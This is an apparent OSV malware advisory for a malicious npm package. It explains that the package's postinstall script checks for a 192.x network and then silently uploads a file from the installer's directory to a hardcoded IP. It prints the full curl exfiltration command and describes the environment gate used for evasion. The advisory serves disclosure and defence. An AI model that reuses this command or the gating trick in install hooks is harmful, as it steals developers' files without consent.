@thomlecter1122/lab-helper-test @0.0.16
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5534
Ecosystem
npm
Summary
The package ships a postinstall lifecycle script (sec_check.js) that fires automatically on `npm install`. The script first checks whether the host has a non-internal IPv4 address beginning with 192. (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes `curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt"` via `child_process.execSync` with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.
Source: amazon-inspector (75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a)